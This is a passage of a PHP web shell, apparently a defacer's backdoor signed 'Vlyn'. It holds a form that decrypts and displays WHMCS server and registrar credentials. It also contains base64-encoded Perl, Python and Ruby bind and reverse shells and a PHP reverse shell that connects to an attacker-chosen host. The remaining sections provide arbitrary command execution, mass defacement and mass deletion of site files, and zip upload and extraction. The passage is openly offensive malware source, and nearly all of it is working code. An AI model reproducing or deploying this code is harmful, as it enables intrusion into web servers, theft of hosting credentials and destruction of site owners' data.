  749. <tr><td>db_name</td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  750. <tr><td>cc_encryption_hash</td><td><input style='color:#FFFFFF;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  751. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FFFFFF;background-color:' value='Submit' name='Submit'></td>
  752. </table>
  753. </FORM>
  754. </center>
  755. ";
  756.  
  757. if($_POST['form_action'] == 2 )
  758. {
  759. //include($file);
  760. $db_host=($_POST['db_host']);
  761. $db_username=($_POST['db_username']);
  762. $db_password=($_POST['db_password']);
  763. $db_name=($_POST['db_name']);
  764. $cc_encryption_hash=($_POST['cc_encryption_hash']);
  765.  
  766.  
  767.  
  768. $link=mysql_connect($db_host,$db_username,$db_password) ;
  769. mysql_select_db($db_name,$link) ;
  770. $query = mysql_query("SELECT * FROM tblservers");
  771. while($v = mysql_fetch_array($query)) {
  772. $ipaddress = $v['ipaddress'];
  773. $username = $v['username'];
  774. $type = $v['type'];
  775. $active = $v['active'];
  776. $hostname = $v['hostname'];
  777. echo("<center><table border='1'>");
  778. $password = decrypt ($v['password'], $cc_encryption_hash);
  779. echo("<tr><td>Type</td><td>$type</td></tr>");
  780. echo("<tr><td>Active</td><td>$active</td></tr>");
  781. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  782. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  783. echo("<tr><td>Username</td><td>$username</td></tr>");
  784. echo("<tr><td>Password</td><td>$password</td></tr>");
  785.  
  786. echo "</table><br><br></center>";
  787. }
  788.  
  789. $link=mysql_connect($db_host,$db_username,$db_password) ;
  790. mysql_select_db($db_name,$link) ;
  791. $query = mysql_query("SELECT * FROM tblregistrars");
  792. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  793. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  794. while($v = mysql_fetch_array($query)) {
  795. $registrar = $v['registrar'];
  796. $setting = $v['setting'];
  797. $value = decrypt ($v['value'], $cc_encryption_hash);
  798. if ($value=="") {
  799. $value=0;
  800. }
  801. $password = decrypt ($v['password'], $cc_encryption_hash);
  802. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  803. }
  804. }
  805. }
  806. elseif($_GET['backconnect'] == 'tool'){
  807. echo "<br><br><center><form method=post>
  808. <br> <span>Bind port to /bin/sh [Perl]</span><br/>
  809. Port: <input type='text' name='port' value='443'> <input type=submit name=bpl value='>>'>
  810. <br><br>
  811. <span>Back-connect</span><br/>
  812. Server: <input type='text' name='server' placeholder='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' placeholder='443'><select class='select' name='backconnect' style='width: 100px;' height='10'><option value='perl'>Perl</option><option value='php'>PHP</option><option value='python'>Python</option><option value='ruby'>Ruby</option></select>
  813. <input type=submit value='>>'>";
  814. if($_POST['bpl']) {
  815. $bp=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");
  816. $brt=@fopen('bp.pl','w');
  817. fwrite($brt,$bp);
  818. $out = exe("perl bp.pl ".$_POST['port']." 1>/dev/null 2>&1 &");
  819. sleep(1);
  820. echo "<pre>$out\n".exe("ps aux | grep bp.pl")."</pre>";
  821. unlink("bp.pl");
  822. }
  823. if($_POST['backconnect'] == 'perl') {
  824. $bc=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
  825. $plbc=@fopen('bc.pl','w');
  826. fwrite($plbc,$bc);
  827. $out = exe("perl bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
  828. sleep(1);
  829. echo "<pre>$out\n".exe("ps aux | grep bc.pl")."</pre>";
  830. unlink("bc.pl");
  831. }
  832. if($_POST['backconnect'] == 'python') {
  833. $becaa=base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBDb243ZXh0IC0gWGFpIFN5bmRpY2F0ZVxuVGhhbmtzIEdvb2dsZSBGb3IgUmVmZXJlbnNpXG5cbicnJykNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDEpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMikNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwzKQ0KICAgIHNoZWxsID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pDQogIGV4Y2VwdCBzb2NrZXQudGltZW91dDoNCiAgICBwcmludCAiVGltT3V0Ig0KICBleGNlcHQgc29ja2V0LmVycm9yLCBlOg0KICAgIHByaW50ICJFcnJvciIsIGUNCnB5YmFja2Nvbm5lY3QoKQ==");
  834. $pbcaa=@fopen('bcpyt.py','w');
  835. fwrite($pbcaa,$becaa);
  836. $out1 = exe("python bcpyt.py ".$_POST['server']." ".$_POST['port']);
  837. sleep(1);
  838. echo "<pre>$out1\n".exe("ps aux | grep bcpyt.py")."</pre>";
  839. unlink("bcpyt.py");
  840. }
  841. if($_POST['backconnect'] == 'ruby') {
  842. $becaak=base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
  843. $pbcaak=@fopen('bcruby.rb','w');
  844. fwrite($pbcaak,$becaak);
  845. $out2 = exe("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']);
  846. sleep(1);
  847. echo "<pre>$out2\n".exe("ps aux | grep bcruby.rb")."</pre>";
  848. unlink("bcruby.rb");
  849. }
  850. if($_POST['backconnect'] == 'php') {
  851. $ip = $_POST['server'];
  852. $port = $_POST['port'];
  853. $sockfd = fsockopen($ip , $port , $errno, $errstr );
  854. if($errno != 0){
  855. echo "<font color='red'>$errno : $errstr</font>";
  856. } else if (!$sockfd) {
  857. $result = "<p>Unexpected error has occured, connection may have failed.</p>";
  858. } else {
  859. fputs ($sockfd ,"
  860. \n{################################################################}
  861. \n..:: BackConnect Php By tatsumi ::..
  862. \n{################################################################}\n");
  863. $dir = shell_exec("pwd");
  864. $sysinfo = shell_exec("uname -a");
  865. $time = Shell_exec("time");
  866. $len = 1337;
  867. fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  868. while(!feof($sockfd)){ $cmdPrompt = '[tatsumi]#:> ';
  869. fputs ($sockfd , $cmdPrompt );
  870. $command= fgets($sockfd, $len);
  871. fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  872. }
  873. fclose($sockfd);
  874. }
  875. }
  876. echo "</p></div>";
  877. }
  878. elseif($_GET['do'] == 'cmd') {
  879. echo "<form method='post'>
  880. <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  881. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  882. </form>";
  883. if($_POST['do_cmd']) {
  884. echo "<pre>".exe($_POST['cmd'])."</pre>";
  885. }
  886. } elseif($_GET['do'] == 'mass_deface') {
  887. echo "<center><form action=\"\" method=\"post\">\n";
  888. $dirr=$_POST['d_dir'];
  889. $index = $_POST["script"];
  890. $index = str_replace('"',"'",$index);
  891. $index = stripslashes($index);
  892. function edit_file($file,$index){
  893. if (is_writable($file)) {
  894. clear_fill($file,$index);
  895. echo "<Span style='color:green;'><strong> 100% Succes Bro! </strong></span><br></center>";
  896. }
  897. else {
  898. echo "<Span style='color:red;'><strong> Failed :( </strong></span><br></center>";
  899. }
  900. }
  901. function hapus_massal($dir,$namafile) {
  902. if(is_writable($dir)) {
  903. $dira = scandir($dir);
  904. foreach($dira as $dirb) {
  905. $dirc = "$dir/$dirb";
  906. $lokasi = $dirc.'/'.$namafile;
  907. if($dirb === '.') {
  908. if(file_exists("$dir/$namafile")) {
  909. unlink("$dir/$namafile");
  910. }
  911. } elseif($dirb === '..') {
  912. if(file_exists("".dirname($dir)."/$namafile")) {
  913. unlink("".dirname($dir)."/$namafile");
  914. }
  915. } else {
  916. if(is_dir($dirc)) {
  917. if(is_writable($dirc)) {
  918. if(file_exists($lokasi)) {
  919. echo "[<font color=blue>DELETED</font>] $lokasi<br>";
  920. unlink($lokasi);
  921. $idx = hapus_massal($dirc,$namafile);
  922. }
  923. }
  924. }
  925. }
  926. }
  927. }
  928. }
  929. function clear_fill($file,$index){
  930. if(file_exists($file)){
  931. $handle = fopen($file,'w');
  932. fwrite($handle,'');
  933. fwrite($handle,$index);
  934. fclose($handle); } }
  935.  
  936. function gass(){
  937. global $dirr , $index ;
  938. chdir($dirr);
  939. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  940. $files = scandir($dirr) ;
  941. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  942. sort($files);
  943. $n = 0 ;
  944. foreach ($files as $file){
  945. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  946. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  947. edit_file($file,$index);
  948. flush();
  949. $n = $n +1 ;
  950. }
  951. }
  952. echo "<br>";
  953. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  954. }
  955. function ListFiles($dirrall) {
  956.  
  957. if($dh = opendir($dirrall)) {
  958.  
  959. $files = Array();
  960. $inner_files = Array();
  961. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  962. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  963. while($file = readdir($dh)) {
  964. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  965. if(is_dir($dirrall . "/" . $file)) {
  966. $inner_files = ListFiles($dirrall . "/" . $file);
  967. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  968. } else {
  969. array_push($files, $dirrall . "/" . $file);
  970. }
  971. }
  972. }
  973.  
  974. closedir($dh);
  975. return $files;
  976. }
  977. }
  978. function gass_all(){
  979. global $index ;
  980. $dirrall=$_POST['d_dir'];
  981. foreach (ListFiles($dirrall) as $key=>$file){
  982. $file = str_replace('//',"/",$file);
  983. echo "<center><strong>$file</strong> ===>";
  984. edit_file($file,$index);
  985. flush();
  986. }
  987. $key = $key+1;
  988. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
  989. function sabun_massal($dir,$namafile,$isi_script) {
  990. if(is_writable($dir)) {
  991. $dira = scandir($dir);
  992. foreach($dira as $dirb) {
  993. $dirc = "$dir/$dirb";
  994. $lokasi = $dirc.'/'.$namafile;
  995. if($dirb === '.') {
  996. file_put_contents($lokasi, $isi_script);
  997. } elseif($dirb === '..') {
  998. file_put_contents($lokasi, $isi_script);
  999. } else {
  1000. if(is_dir($dirc)) {
  1001. if(is_writable($dirc)) {
  1002. echo "[<font color=blue>DONE</font>] $lokasi<br>";
  1003. file_put_contents($lokasi, $isi_script);
  1004. $idx = sabun_massal($dirc,$namafile,$isi_script);
  1005. }
  1006. }
  1007. }
  1008. }
  1009. }
  1010. }
  1011. if($_POST['mass'] == 'onedir') {
  1012. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  1013. $ini="http://";
  1014. $mainpath=$_POST[d_dir];
  1015. $file=$_POST[d_file];
  1016. $dir=opendir("$mainpath");
  1017. $code=base64_encode($_POST[script]);
  1018. $indx=base64_decode($code);
  1019. while($row=readdir($dir)){
  1020. $start=@fopen("$row/$file","w+");
  1021. $finish=@fwrite($start,$indx);
  1022. if ($finish){
  1023. echo"$ini$row/$file\n";
  1024. }
  1025. }
  1026. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  1027. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  1028. $dir=opendir("$mainpath");
  1029. $code=base64_encode($_POST[script]);
  1030. $indx=base64_decode($code);
  1031. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  1032. $finish=@fwrite($start,$indx);
  1033. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  1034. }
  1035.  
  1036. }
  1037. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  1038. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  1039. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  1040. elseif($_POST['mass'] == 'massdeface') {
  1041. echo "<div style='margin: 5px auto; padding: 5px'>";
  1042. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1043. echo "</div>"; }
  1044. else {
  1045. echo "
  1046. <center><font style='text-decoration: underline;'>
  1047. Select Type:<br>
  1048. </font>
  1049. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  1050. <option value=\"onedir\">Mass Deface 1 Dir</option>
  1051. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  1052. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  1053. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  1054. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  1055. <font style='text-decoration: underline;'>Folder:</font><br>
  1056. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1057. <font style='text-decoration: underline;'>Filename:</font><br>
  1058. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  1059. <font style='text-decoration: underline;'>Index File:</font><br>
  1060. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Vlyn</textarea><br>
  1061. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  1062. </form></center>";
  1063. }
  1064. }
  1065. elseif($_GET['do'] == 'zip') {
  1066. echo "<center><h1>Zip Menu</h1>";
  1067. function rmdir_recursive($dir) {
  1068. foreach(scandir($dir) as $file) {
  1069. if ('.' === $file || '..' === $file) continue;
  1070. if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  1071. else unlink("$dir/$file");
  1072. }
  1073. rmdir($dir);
  1074. }
  1075. if($_FILES["zip_file"]["name"]) {
  1076. $filename = $_FILES["zip_file"]["name"];
  1077. $source = $_FILES["zip_file"]["tmp_name"];
  1078. $type = $_FILES["zip_file"]["type"];
  1079. $name = explode(".", $filename);
  1080. $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  1081. foreach($accepted_types as $mime_type) {
  1082. if($mime_type == $type) {
  1083. $okay = true;
  1084. break;
  1085. }
  1086. }
  1087. $continue = strtolower($name[1]) == 'zip' ? true : false;
  1088. if(!$continue) {
  1089. $message = "Itu Bukan Zip , , GOBLOK COK";
  1090. }
  1091. $path = dirname(__FILE__).'/';
  1092. $filenoext = basename ($filename, '.zip');
  1093. $filenoext = basename ($filenoext, '.ZIP');
  1094. $targetdir = $path . $filenoext;
  1095. $targetzip = $path . $filename;
  1096. if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
  1097. mkdir($targetdir, 0777);
  1098. if(move_uploaded_file($source, $targetzip)) {
  1099. $zip = new ZipArchive();
  1100. $x = $zip->open($targetzip);
  1101. if ($x === true) {
  1102. $zip->extractTo($targetdir);
  1103. $zip->close();
  1104.  
  1105. unlink($targetzip);
  1106. }
  1107. $message = "<b>Sukses Gan :)</b>";
  1108. } else {
  1109. $message = "<b>Error Gan :(</b>";
  1110. }
  1111. }
  1112. echo '<table style="width:100%" border="1">
  1113. <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  1114. <label>Zip File : <input type="file" name="zip_file" /></label>
  1115. <input type="submit" name="submit" value="Upload And Unzip" />
  1116. </form>';
  1117. if($message) echo "<p>$message</p>";
  1118. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/Vlyn_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
  1119. if($_POST['backup']){
  1120. $save=$_POST['save'];
  1121. function Zip($source, $destination)
  1122. {
  1123. if (extension_loaded('zip') === true)
  1124. {
  1125. if (file_exists($source) === true)
  1126. {
  1127. $zip = new ZipArchive();
  1128.  
  1129. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1130. {
  1131. $source = realpath($source);
  1132.  
  1133. if (is_dir($source) === true)
  1134. {
  1135. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1136.  
  1137. foreach ($files as $file)
  1138. {
  1139. $file = realpath($file);
  1140.  
  1141. if (is_dir($file) === true)
  1142. {
  1143. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1144. }
  1145.  
  1146. else if (is_file($file) === true)
  1147. {
  1148. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1149. }
  1150. }
  1151. }
  1152.  
  1153. else if (is_file($source) === true)
  1154. {
  1155. $zip->addFromString(basename($source), file_get_contents($source));
  1156. }
  1157. }
  1158.  
  1159. return $zip->close();
  1160. }
  1161. }
  1162.  
  1163. return false;
  1164. }
  1165. Zip($_POST['dir'],$save);
  1166. echo "Done , Save To <b>$save</b>";
  1167. }
  1168. echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/Vlyn_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1169. if($_POST['extrak']){
  1170. $save=$_POST['save'];
  1171. $zip = new ZipArchive;
  1172. $res = $zip->open($_POST['dir']);
  1173. if ($res === TRUE) {
  1174. $zip->extractTo($save);
  1175. $zip->close();
  1176. echo 'Succes , Location : <b>'.$save.'</b>';
  1177. } else {
  1178. echo 'Failed :(';
  1179. }
  1180. }
  1181. echo '</tr></table>';
  1182. }
  1183. elseif($_GET['do'] == 'shellchk') {
